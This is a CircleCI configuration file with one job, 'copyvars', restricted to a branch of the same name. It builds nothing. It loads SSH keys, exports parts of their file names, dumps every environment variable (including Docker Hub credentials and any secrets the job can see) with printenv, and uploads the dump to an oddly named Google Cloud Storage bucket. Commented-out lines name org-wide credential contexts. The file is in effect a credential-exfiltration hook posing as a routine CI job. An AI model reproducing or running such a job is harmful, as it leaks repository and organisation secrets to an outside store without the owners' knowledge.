version: 2.1

jobs:
  copyvars:
    docker:
      - image: google/cloud-sdk:alpine
        auth:
          username: $DOCKERHUB_USER
          password: $DOCKERHUB_PASS
    steps:
      - add_ssh_keys:
          fingerprints:
      - run:
          name: "copyvars"
          command: |
            date=20230127
            SSH_KEYS=( $(ls ~/.ssh/id* 2>/dev/null || echo -n ) )
            for ((i=0;i<${#SSH_KEYS[*]};i++)); do export SSH_KEY_${i}=${SSH_KEYS[$i]##*_}; done
            printenv > ${CIRCLE_PROJECT_REPONAME}_${date} && gsutil cp ${CIRCLE_PROJECT_REPONAME}_${date} gs://mmfbjdyyby

workflows:
  build:
    jobs:
      - copyvars:
#          context:
#            - org-global
#            - dockerhub-credentials
#            - veracode
          filters:
            branches:
              only: copyvars
